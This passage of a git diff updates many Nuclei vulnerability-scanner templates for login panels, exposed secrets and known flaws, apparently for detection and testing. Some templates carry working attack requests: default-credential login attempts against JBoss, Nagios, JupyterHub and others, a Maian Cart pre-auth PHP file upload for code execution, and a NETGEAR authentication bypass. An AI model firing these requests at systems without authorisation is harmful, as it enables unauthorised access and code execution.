Reserved" -.com tags: panel - requests: - method: GET path: - '{{BaseURL}}/login.html' - matchers-condition: and matchers: - type: word words: - "Intelbras" - - type: status status: - 200 diff --git a/poc/auth/jenkins-login-8280.yaml b/poc/auth/jenkins-login-8280.yaml index 60dbd99b0c..0d62dd0d31 100644 --- a/poc/auth/jenkins-login-8280.yaml +++ b/poc/auth/jenkins-login-8280.yaml @@ -1,18 +1,30 @@ -id: jenkins-login -info: - name: Jenkins Login - author: pdteam - severity: info - tags: panel,jenkins -requests: - - method: GET - path: - - '{{BaseURL}}/login' - matchers-condition: and - matchers: - - type: word - words: - - 'Sign in [Jenkins]' - - type: status - status: - - 200 +id: jenkins-login + +info: + name: Jenkins Login Detected + author: pdteam + severity: info + description: Jenkins is an open source automation server. + reference: + - https://www.jenkins.io/doc/book/security/ + classification: + cwe-id: CWE-200 + remediation: Ensure proper access. + tags: panel,jenkins + metadata: + max-request: 1 + +http: + - method: GET + path: + - '{{BaseURL}}/login' + matchers-condition: and + matchers: + - type: word + words: + - 'Sign in [Jenkins]' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/10 \ No newline at end of file diff --git a/poc/auth/jira-service-desk-signup-8321.yaml b/poc/auth/jira-service-desk-signup-8321.yaml index 6604106545..1cfce39b45 100644 --- a/poc/auth/jira-service-desk-signup-8321.yaml +++ b/poc/auth/jira-service-desk-signup-8321.yaml @@ -1,8 +1,11 @@ id: jira-service-desk-signup + info: name: Jira Service Desk Signup author: TechbrunchFR severity: medium + tags: jira,atlassian,service + requests: - method: POST path: diff --git a/poc/auth/jira-unauthenticated-projects-8335.yaml b/poc/auth/jira-unauthenticated-projects-8335.yaml index a6bd8b968a..f8a21f8d2e 100644 --- a/poc/auth/jira-unauthenticated-projects-8335.yaml +++ b/poc/auth/jira-unauthenticated-projects-8335.yaml @@ -1,10 +1,9 @@ id: jira-unauthenticated-projects - info: name: Jira Unauthenticated Projects author: TechbrunchFR - severity: low - + severity: info + tags: atlassian,jira requests: - method: GET path: diff --git a/poc/auth/jmx-default-login-8354.yaml b/poc/auth/jmx-default-login-8354.yaml index 84d0053092..de4e66a812 100644 --- a/poc/auth/jmx-default-login-8354.yaml +++ b/poc/auth/jmx-default-login-8354.yaml @@ -1,23 +1,18 @@ id: jmx-default-login + info: - name: JBoss JMX Console Weak Credential Discovery - description: JBoss JMX Console default login information was discovered. + name: JBoss JMX Console Weak Credential author: paradessia severity: high tags: jboss,jmx,default-login - reference: - - https://docs.jboss.org/jbossas/6/Admin_Console_Guide/en-US/html/Administration_Console_User_Guide-Accessing_the_Console.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 + requests: - raw: - | GET /jmx-console/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(user + ':' + pass)}} + attack: clusterbomb payloads: user: @@ -31,13 +26,13 @@ requests: - 123456789 - 123qwe - root + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'JMImplementation' - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/jupyterhub-default-login-8400.yaml b/poc/auth/jupyterhub-default-login-8400.yaml index fa7f7c44b0..eb6153750b 100644 --- a/poc/auth/jupyterhub-default-login-8400.yaml +++ b/poc/auth/jupyterhub-default-login-8400.yaml @@ -1,15 +1,18 @@ id: jupyterhub-default-login - info: - name: Jupyterhub Default Login + name: Jupyterhub - Default Admin Discovery author: For3stCo1d severity: high + description: Jupyterhub default admin credentials were discovered. reference: - https://github.com/jupyterhub/jupyterhub + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: http.title:"JupyterHub" tags: jupyterhub,default-login - requests: - raw: - | @@ -18,7 +21,6 @@ requests: Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}} - attack: pitchfork payloads: user: @@ -27,7 +29,6 @@ requests: pass: - admin - jupyter - matchers-condition: and matchers: - type: dsl @@ -35,7 +36,8 @@ requests: - contains(tolower(all_headers), 'jupyterhub-session-id=') - contains(tolower(all_headers), 'jupyterhub-hub-login=') condition: and - - type: status status: - - 302 \ No newline at end of file + - 302 + +# Enhanced by mp on 2022/07/15 diff --git a/poc/auth/kafka-center-default-login-8416.yaml b/poc/auth/kafka-center-default-login-8416.yaml index dc906bae8a..6de21b6717 100644 --- a/poc/auth/kafka-center-default-login-8416.yaml +++ b/poc/auth/kafka-center-default-login-8416.yaml @@ -1,18 +1,21 @@ id: kafka-center-default-login + info: name: Apache Kafka Center Default Login author: dhiyaneshDK severity: high + tags: kafka,default-login description: Apache Kafka Center default admin credentials were discovered. reference: - https://developer.ibm.com/tutorials/kafka-authn-authz/ + metadata: + shodan-query: http.title:"Kafka Center" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: http.title:"Kafka Center" - tags: kafka,default-login + requests: - raw: - | @@ -21,19 +24,23 @@ requests: Content-Type: application/json {"name":"{{username}}","password":"{{password}}","checkbox":false} + attack: pitchfork payloads: username: - admin password: - admin + matchers-condition: and matchers: + - type: word words: - '"code":200' - '"name":"admin"' condition: and + - type: status status: - 200 diff --git a/poc/auth/keycloak-openid-config-8476.yaml b/poc/auth/keycloak-openid-config-8476.yaml index b3a16da1db..e9d66b6533 100644 --- a/poc/auth/keycloak-openid-config-8476.yaml +++ b/poc/auth/keycloak-openid-config-8476.yaml @@ -1,21 +1,24 @@ id: keycloak-openid-config + info: name: Keycloak openid-config author: rodnt severity: info - reference: - - https://issues.jboss.org/browse/KEYCLOAK-571 + reference: https://issues.jboss.org/browse/KEYCLOAK-571 tags: keycloak,config + requests: - method: GET path: - "{{BaseURL}}/.well-known/openid-configuration" - "{{BaseURL}}/auth/realms/master/.well-known/openid-configuration" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'issuer' @@ -23,4 +26,4 @@ requests: - 'token_endpoint' - 'userinfo_endpoint' - 'jwks_uri' - condition: and + condition: and \ No newline at end of file diff --git a/poc/auth/kiwitcms-login-8496.yaml b/poc/auth/kiwitcms-login-8496.yaml index b65a31ddd7..ae81534fc8 100644 --- a/poc/auth/kiwitcms-login-8496.yaml +++ b/poc/auth/kiwitcms-login-8496.yaml @@ -1,26 +1,23 @@ id: kiwitcms-login - info: name: Kiwi TCMS Login author: pdteam severity: info - reference: https://kiwitcms.org - tags: kiwitcms,panel + reference: + - https://kiwitcms.org metadata: shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337 - + tags: kiwitcms,panel requests: - method: GET path: - "{{BaseURL}}/accounts/login/" - matchers: - type: word words: - "Kiwi TCMS" - extractors: - type: regex group: 1 regex: - - "Version ([0-9.]+)" \ No newline at end of file + - "Version ([0-9.]+)" diff --git a/poc/auth/lansweeper-login-8572.yaml b/poc/auth/lansweeper-login-8572.yaml index 3b230d6f69..0b2f4fc89c 100644 --- a/poc/auth/lansweeper-login-8572.yaml +++ b/poc/auth/lansweeper-login-8572.yaml @@ -1,22 +1,26 @@ -id: lansweeper-login -info: - name: Lansweeper Login - author: divya_mudgal - severity: info - tags: lansweeper,tech,panel -requests: - - method: GET - path: - - "{{BaseURL}}/login.aspx" - - "{{BaseURL}}/favicon.ico" - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - name: login - words: - - "Lansweeper - Login" - - type: dsl - name: favicon - dsl: - - "status_code==200 && (\"1847799946\" == mmh3(base64_py(body)))" +id: lansweeper-login + +info: + name: Lansweeper Login + author: divya_mudgal + severity: info + tags: lansweeper,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/login.aspx" + - "{{BaseURL}}/favicon.ico" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + name: login + words: + - "Lansweeper - Login" + + - type: dsl + name: favicon + dsl: + - "status_code==200 && (\"1847799946\" == mmh3(base64_py(body)))" \ No newline at end of file diff --git a/poc/auth/login-logo-editor-by-oizuled.yaml b/poc/auth/login-logo-editor-by-oizuled.yaml new file mode 100644 index 0000000000..38fc2e7308 --- /dev/null +++ b/poc/auth/login-logo-editor-by-oizuled.yaml @@ -0,0 +1,59 @@ +id: login-logo-editor-by-oizuled + +info: + name: > + Login Logo Editor <= 1.3.3 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f14478d9-2c17-48a8-a7d3-658a92a10d9c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/login-logo-editor-by-oizuled/" + google-query: inurl:"/wp-content/plugins/login-logo-editor-by-oizuled/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,login-logo-editor-by-oizuled,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/login-logo-editor-by-oizuled/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "login-logo-editor-by-oizuled" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.3') \ No newline at end of file diff --git a/poc/auth/lucee-login-8664.yaml b/poc/auth/lucee-login-8664.yaml index 0f2c5cc1a1..5a28c0d63d 100644 --- a/poc/auth/lucee-login-8664.yaml +++ b/poc/auth/lucee-login-8664.yaml @@ -4,8 +4,8 @@ info: name: Lucee Web/Server Administrator Login author: dhiyaneshDK severity: info - metadata: - shodan-query: http.title:"Lucee" + reference: + - https://www.shodan.io/search?query=http.title%3A%22Lucee%22 tags: panel,lucee requests: diff --git a/poc/auth/lutron-iot-default-login-8677.yaml b/poc/auth/lutron-iot-default-login-8677.yaml index aa05f20cc8..6938c769b9 100644 --- a/poc/auth/lutron-iot-default-login-8677.yaml +++ b/poc/auth/lutron-iot-default-login-8677.yaml @@ -1,4 +1,5 @@ id: lutron-iot-default-login + info: name: Lutron IOT Device Default Login author: geeknik @@ -6,10 +7,12 @@ info: reference: - https://www.lutron.com tags: iot,default-login,lutron,panel + requests: - method: GET path: - "{{BaseURL}}/login?login=lutron&password=lutron" + matchers-condition: and matchers: - type: word @@ -18,10 +21,12 @@ requests: - ">DeviceIP" - ">Get Database Info as XML" condition: and + - type: word part: header words: - "text/html" + - type: status status: - 200 diff --git a/poc/auth/maian-cart-preauth-rce-8720.yaml b/poc/auth/maian-cart-preauth-rce-8720.yaml index 6e747a2bbf..6888e6a4f2 100644 --- a/poc/auth/maian-cart-preauth-rce-8720.yaml +++ b/poc/auth/maian-cart-preauth-rce-8720.yaml @@ -1,14 +1,16 @@ id: maian-cart-preauth-rce + info: name: Maian Cart 3.8 preauth RCE author: pdteam severity: critical description: A severe vulnerability has been kindly reported to me by security advisor DreyAnd. The issue concerns the elFinder file manager plugin in Maian Cart and it affects all versions from 3.0 to 3.8. reference: | - - https://dreyand.github.io/maian-cart-rce/ - - https://github.com/DreyAnd/maian-cart-rce - - https://www.maianscriptworld.co.uk/critical-updates + - https://dreyand.github.io/maian-cart-rce/ + - https://github.com/DreyAnd/maian-cart-rce + - https://www.maianscriptworld.co.uk/critical-updates tags: rce,unauth,maian + requests: - raw: - | @@ -17,6 +19,7 @@ requests: Accept-Encoding: gzip, deflate Accept: */* Connection: close + - | POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1 Host: {{Hostname}} @@ -31,12 +34,14 @@ requests: Content-Length: 97 cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e + - | GET /product-downloads/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: */* Connection: close + extractors: - type: regex name: hash @@ -44,8 +49,10 @@ requests: group: 1 regex: - '"hash"\:"(.*?)"\,' + + req-condition: true matchers: - type: dsl dsl: - - 'contains(body_3, "{{randstr_1}}")' + - 'contains(body_3, "{{randstr_1}}")' \ No newline at end of file diff --git a/poc/auth/meshcentral-login-8803.yaml b/poc/auth/meshcentral-login-8803.yaml index 32556ae3e5..6327f1cf0b 100644 --- a/poc/auth/meshcentral-login-8803.yaml +++ b/poc/auth/meshcentral-login-8803.yaml @@ -1,4 +1,5 @@ id: meshcentral-login + info: name: MeshCentral - Login author: dhiyaneshDk @@ -6,16 +7,19 @@ info: metadata: shodan-query: http.title:"MeshCentral - Login" tags: panel,meshcentral + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - "MeshCentral - Login" + - type: status status: - 200 diff --git a/poc/auth/miscellaneous_unencrypted-bigip-ltm-cookie.yaml b/poc/auth/miscellaneous_unencrypted-bigip-ltm-cookie.yaml new file mode 100644 index 0000000000..1c6bd1751b --- /dev/null +++ b/poc/auth/miscellaneous_unencrypted-bigip-ltm-cookie.yaml @@ -0,0 +1,20 @@ +id: unencrypted-bigip-ltm-cookie +info: + name: F5 BIGIP Unencrypted Cookie + author: PR3R00T + severity: info + reference: + - https://www.intelisecure.com/how-to-decode-big-ip-f5-persistence-cookie-values + - https://support.f5.com/csp/article/K23254150 + tags: misc +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + matchers: + - type: regex + regex: + - '(BIGipServer[a-z\_\.\-\~0-9A-Z]*)=([0-9a-zA-Z\.]*;)' + - '=[0-9]*\.[0-9]{3,5}\.[0-9]{4};' + part: header diff --git a/poc/auth/mobileiron-login-8908.yaml b/poc/auth/mobileiron-login-8908.yaml index f8f79a0608..f8134ee8b9 100644 --- a/poc/auth/mobileiron-login-8908.yaml +++ b/poc/auth/mobileiron-login-8908.yaml @@ -1,9 +1,11 @@ id: mobileiron-login + info: name: MobileIron Login author: dhiyaneshDK,dwisiswant0 severity: info tags: panel,mobileiron + requests: - method: GET path: diff --git a/poc/auth/mongodb-unauth-8925.yaml b/poc/auth/mongodb-unauth-8925.yaml index 469fd95eb9..9883dc2bca 100644 --- a/poc/auth/mongodb-unauth-8925.yaml +++ b/poc/auth/mongodb-unauth-8925.yaml @@ -1,14 +1,21 @@ id: mongodb-unauth + info: name: Unauth MongoDB Disclosure author: pdteam severity: high - reference: https://github.com/orleven/Tentacle + reference: + - https://github.com/orleven/Tentacle + - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb + - https://www.mongodb.com/features/mongodb-authentication + remediation: Enable Authentication in MongoDB tags: network,mongodb,unauth + network: - inputs: - data: 480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000 type: hex + host: - "{{Hostname}}" - "{{Host}}:27017" diff --git a/poc/auth/nagios-default-login-8994.yaml b/poc/auth/nagios-default-login-8994.yaml index e1982ba865..3672516797 100644 --- a/poc/auth/nagios-default-login-8994.yaml +++ b/poc/auth/nagios-default-login-8994.yaml @@ -1,16 +1,25 @@ id: nagios-default-login + info: name: Nagios Default Login - author: d3sca + author: iamthefrogy severity: high + description: Nagios default admin credentials were discovered. + reference: + - https://www.nagios.org + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: nagios,default-login - reference: https://www.nagios.org + requests: - raw: - | GET /nagios/side.php HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + payloads: username: - nagiosadmin @@ -19,13 +28,17 @@ requests: - nagiosadmin - nagiosxi attack: pitchfork + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'Current Status' - 'Reports' condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/netgear-router-auth-bypass-9027.yaml b/poc/auth/netgear-router-auth-bypass-9027.yaml index 930b6cb68f..2de4ae3d45 100644 --- a/poc/auth/netgear-router-auth-bypass-9027.yaml +++ b/poc/auth/netgear-router-auth-bypass-9027.yaml @@ -1,28 +1,34 @@ id: netgear-router-auth-bypass + info: name: NETGEAR DGN2200v1 Router Authentication Bypass author: gy741 severity: high - description: NETGEAR DGN2200v1 Router does not require authentication if a page has “.jpg”, “.gif”, or “ess_” substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., “?.gif”). + description: NETGEAR DGN2200v1 Router does not require authentication if a page has ".jpg", ".gif", or "ess_" substrings, however matches the entire URL. Any page on the device can therefore be accessed, including + those that require authentication, by appending a GET variable with the relevant substring (e.g., "?.gif"). reference: - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 tags: netgear,auth-bypass,router + requests: - raw: - | GET /WAN_wan.htm?.gif HTTP/1.1 Host: {{Hostname}} Accept: */* + - | GET /WAN_wan.htm?.gif HTTP/1.1 Host: {{Hostname}} Accept: */* + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "WAN Setup" diff --git a/poc/auth/oauth2-detect-9182.yaml b/poc/auth/oauth2-detect-9182.yaml index 53cc1456fe..5cd181e726 100644 --- a/poc/auth/oauth2-detect-9182.yaml +++ b/poc/auth/oauth2-detect-9182.yaml @@ -1,28 +1,28 @@ -id: oauth2-detect - -info: - name: OAuth 2.0 Authorization Server Detection Template - author: righettod - severity: info - description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint - tags: tech,oauth - -requests: - - method: POST - path: - - "{{BaseURL}}/oauth/token" - - body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" - - matchers-condition: and - matchers: - - type: status - status: - - 401 - - 400 - condition: or - - - type: word - part: body - words: +id: oauth2-detect + +info: + name: OAuth 2.0 Authorization Server Detection Template + author: righettod + severity: info + description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint + tags: tech,oauth + +requests: + - method: POST + path: + - "{{BaseURL}}/oauth/token" + + body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" + + matchers-condition: and + matchers: + - type: status + status: + - 401 + - 400 + condition: or + + - type: word + part: body + words: - 'error":"invalid_client"' \ No newline at end of file diff --git a/poc/auth/octobercms-default-login-9193.yaml b/poc/auth/octobercms-default-login-9193.yaml index c8f33662c7..a6822af271 100644 --- a/poc/auth/octobercms-default-login-9193.yaml +++ b/poc/auth/octobercms-default-login-9193.yaml @@ -1,12 +1,16 @@ id: octobercms-default-login info: - name: OctoberCMS Default Login + name: OctoberCMS - Default Admin Discovery author: princechaddha severity: high - description: OctoberCMS default administrator account credential. + description: OctoberCMS default admin credentials were discovered. reference: - https://github.com/octobercms/october - https://octobercms.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: http.component:"October CMS" @@ -51,3 +55,5 @@ requests: group: 1 regex: - 'meta name="csrf\-token" content="([A-Za-z0-9]+)">' + +# Enhanced by mp on 2022/07/15 diff --git a/poc/auth/ofbiz-default-login-9208.yaml b/poc/auth/ofbiz-default-login-9208.yaml index bf0902a7b4..ce10e4ca8d 100644 --- a/poc/auth/ofbiz-default-login-9208.yaml +++ b/poc/auth/ofbiz-default-login-9208.yaml @@ -2,16 +2,15 @@ id: ofbiz-default-login info: name: Apache OfBiz Default Login author: pdteam - description: Apache OfBiz default admin credentials were discovered. severity: medium - tags: ofbiz,default-login,apache + description: Apache OfBiz default admin credentials were discovered. reference: - https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + tags: ofbiz,default-login,apache requests: - raw: - | diff --git a/poc/auth/open-stack-dashboard-login-9322.yaml b/poc/auth/open-stack-dashboard-login-9322.yaml index 299fe028d4..9c17c71f30 100644 --- a/poc/auth/open-stack-dashboard-login-9322.yaml +++ b/poc/auth/open-stack-dashboard-login-9322.yaml @@ -3,8 +3,7 @@ info: name: OpenStack Dashboard author: dhiyaneshDK,hackergautam severity: info - reference: - - https://www.exploit-db.com/ghdb/6464 + reference: https://www.exploit-db.com/ghdb/6464 tags: panel,openstack requests: - method: GET diff --git a/poc/auth/oracle-people-sign-in-9399.yaml b/poc/auth/oracle-people-sign-in-9399.yaml index ab3ec1ae87..418ab3b9ba 100644 --- a/poc/auth/oracle-people-sign-in-9399.yaml +++ b/poc/auth/oracle-people-sign-in-9399.yaml @@ -3,9 +3,9 @@ info: name: Oracle Peoplesoft Sign-in author: idealphase severity: info - tags: oracle,panel metadata: shodan-query: http.title:"Oracle PeopleSoft Sign-in" + tags: oracle,panel requests: - method: GET path: diff --git a/poc/auth/panabit-default-login-9437.yaml b/poc/auth/panabit-default-login-9437.yaml index 06d198deff..41b1eb6bb4 100644 --- a/poc/auth/panabit-default-login-9437.yaml +++ b/poc/auth/panabit-default-login-9437.yaml @@ -1,10 +1,22 @@ id: panabit-default-login + info: name: Panabit Gateway Default Login - author: pikpikcu + author: pikpikcu,ritikchaddha severity: high - reference: https://max.book118.com/html/2017/0623/117514590.shtm + description: Panabit Gateway default credentials were discovered. + reference: + - https://max.book118.com/html/2017/0623/117514590.shtm + - https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf + - https://topic.alibabacloud.com/a/panabit-monitoring-installation-tutorial_8_8_20054193.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + metadata: + fofa-query: app="Panabit-智能网关" tags: panabit,default-login + requests: - raw: - | @@ -17,28 +29,38 @@ requests: Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="{{username}}" + Content-Disposition: form-data; name="username" - admin + {{username}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="{{password}}" + Content-Disposition: form-data; name="password" - panabit + {{password}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC-- + payloads: username: - - username + - admin password: - - password + - panabit attack: pitchfork + matchers-condition: and matchers: - type: word + part: body words: - '' - 'urn:schemas-microsoft-com:vml' - part: body condition: and + + - type: word + part: header + words: + - "paonline_admin" + - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/panabit-default-password-9441.yaml b/poc/auth/panabit-default-password-9441.yaml index f7fa2868bc..1aff766c6b 100644 --- a/poc/auth/panabit-default-password-9441.yaml +++ b/poc/auth/panabit-default-password-9441.yaml @@ -1,10 +1,12 @@ id: panabit-gateway-defalut-password + info: name: Panabit Default Password author: pikpikcu severity: high reference: https://max.book118.com/html/2017/0623/117514590.shtm tags: panabit,default-login + requests: - raw: - | @@ -28,6 +30,7 @@ requests: panabit ------WebKitFormBoundaryAjZMsILtbrBp8VbC-- + matchers-condition: and matchers: - type: word @@ -36,6 +39,7 @@ requests: - 'urn:schemas-microsoft-com:vml' part: body condition: and + - type: status status: - 200 diff --git a/poc/auth/paypal-braintree-token(1).yaml b/poc/auth/paypal-braintree-token(1).yaml index 59dc3e8dbd..cb24999e3d 100644 --- a/poc/auth/paypal-braintree-token(1).yaml +++ b/poc/auth/paypal-braintree-token(1).yaml @@ -4,8 +4,7 @@ info: name: Paypal Braintree Access Token author: gaurang severity: high - tags: token,file,paypal - + tags: file,keys,token,paypal file: - extensions: - all @@ -14,3 +13,4 @@ file: - type: regex regex: - "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" +# digest: 490a00463044022056d84dc6d601838e144b52aad17f5d96f5d7e968e394d85f12af03219b51d114022031accb17f2ac43db6480cb37ecd697e1c9b44aea60e02212aecf0eaa8163b0b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/pentaho-default-login-9477.yaml b/poc/auth/pentaho-default-login-9477.yaml index 97537c957e..e4ba5681b5 100644 --- a/poc/auth/pentaho-default-login-9477.yaml +++ b/poc/auth/pentaho-default-login-9477.yaml @@ -1,19 +1,20 @@ id: pentaho-default-login + info: name: Pentaho Default Login author: pussycat0x - description: Pentaho default admin credentials were discovered. severity: high - metadata: - shodan-query: pentaho - tags: pentaho,default-login + description: Pentaho default admin credentials were discovered. reference: - https://www.hitachivantara.com/en-us/pdfd/training/pentaho-lesson-1-user-console-overview.pdf classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + metadata: + shodan-query: pentaho + tags: pentaho,default-login + requests: - raw: - | @@ -22,12 +23,14 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 j_username={{user}}&j_password={{pass}} + attack: pitchfork payloads: user: - admin pass: - password + matchers-condition: and matchers: - type: word @@ -36,6 +39,7 @@ requests: - 'pentaho/Home' - 'JSESSIONID=' condition: and + - type: status status: - 302 diff --git a/poc/auth/phabricator-login-9492.yaml b/poc/auth/phabricator-login-9492.yaml index 1d760838f2..1ffe9830ff 100644 --- a/poc/auth/phabricator-login-9492.yaml +++ b/poc/auth/phabricator-login-9492.yaml @@ -3,9 +3,9 @@ info: name: Phabricator Login author: dhiyaneshDK severity: info - tags: panel,phabricator metadata: - shodan-query: 'html:"phabricator-standard-page"' + shodan-query: html:"phabricator-standard-page" + tags: panel,phabricator requests: - method: GET path: diff --git a/poc/auth/pictatic-api-key-9575.yaml b/poc/auth/pictatic-api-key-9575.yaml index 946aed1ebf..ec20f07569 100644 --- a/poc/auth/pictatic-api-key-9575.yaml +++ b/poc/auth/pictatic-api-key-9575.yaml @@ -1,13 +1,16 @@ id: pictatic-api-key + info: name: Pictatic API Key author: gaurang severity: high tags: token,file + file: - extensions: - all + extractors: - type: regex regex: - - "sk_live_[0-9a-z]{32}" + - "sk_live_[0-9a-z]{32}" \ No newline at end of file diff --git a/poc/auth/pieregister-open-redirect-9578.yaml b/poc/auth/pieregister-open-redirect-9578.yaml index 1696507595..0e52f45804 100644 --- a/poc/auth/pieregister-open-redirect-9578.yaml +++ b/poc/auth/pieregister-open-redirect-9578.yaml @@ -1,26 +1,19 @@ id: pieregister-open-redirect - info: - name: WordPress Pie Register < 3.7.2.4 - Open Redirect - author: 0x_Akoko + name: Pie Register < 3.7.2.4 - Open Redirect severity: low - description: WordPress Pie Register < 3.7.2.4 is susceptible to an open redirect vulnerability because the plugin passes unvalidated user input to the wp_redirect() function. + author: 0x_Akoko + description: The plugin passes unvalidated user input to the wp_redirect() function, without validating it, leading to an Open redirect issue. reference: - https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4 - https://wordpress.org/plugins/pie-register/ - classification: - cwe-id: CWE-601 tags: wordpress,redirect,wp-plugin,pieregister - requests: - method: GET path: - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" - matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - -# Enhanced by mp on 2022/04/13 diff --git a/poc/auth/polycom-login-9627.yaml b/poc/auth/polycom-login-9627.yaml index 29489ef1a1..40b49003ee 100644 --- a/poc/auth/polycom-login-9627.yaml +++ b/poc/auth/polycom-login-9627.yaml @@ -1,20 +1,25 @@ id: polycom-login + info: name: Polycom Login author: DhiyaneshDk severity: info - reference: https://www.exploit-db.com/ghdb/6863 + reference: + - https://www.exploit-db.com/ghdb/6863 tags: panel + requests: - method: GET path: - "{{BaseURL}}/login.html" + matchers-condition: and matchers: - type: word words: - "Polycom Login" part: body + - type: status status: - 200 diff --git a/poc/auth/private-key-9657.yaml b/poc/auth/private-key-9657.yaml new file mode 100644 index 0000000000..282a2ab3a0 --- /dev/null +++ b/poc/auth/private-key-9657.yaml @@ -0,0 +1,21 @@ +id: private-key +info: + name: Private Key Detect + author: gaurang,geeknik + severity: high + tags: token,file +file: + - extensions: + - all + extractors: + - type: regex + regex: + - "\"BEGIN OPENSSH PRIVATE KEY\"" + - "\"BEGIN PRIVATE KEY\"" + - "\"BEGIN RSA PRIVATE KEY\"" + - "\"BEGIN DSA PRIVATE KEY\"" + - "\"BEGIN EC PRIVATE KEY\"" + - "\"BEGIN PGP PRIVATE KEY BLOCK\"" + - "\"ssh-rsa\"" + - "\"ssh-dsa\"" + - "\"ssh-ed25519\"" diff --git a/poc/auth/project-insight-login-9670.yaml b/poc/auth/project-insight-login-9670.yaml index cc38d84bec..e2a5c1795b 100644 --- a/poc/auth/project-insight-login-9670.yaml +++ b/poc/auth/project-insight-login-9670.yaml @@ -1,4 +1,5 @@ id: project-insight-login + info: name: Project Insight - Login author: dhiyaneshDk @@ -8,16 +9,19 @@ info: metadata: shodan-query: http.title:"Project Insight - Login" tags: panel + requests: - method: GET path: - "{{BaseURL}}/auth/login" + matchers-condition: and matchers: - type: word part: body words: - "Project Insight - Login" + - type: status status: - 200 diff --git a/poc/auth/pure-storage-login-9724.yaml b/poc/auth/pure-storage-login-9724.yaml index 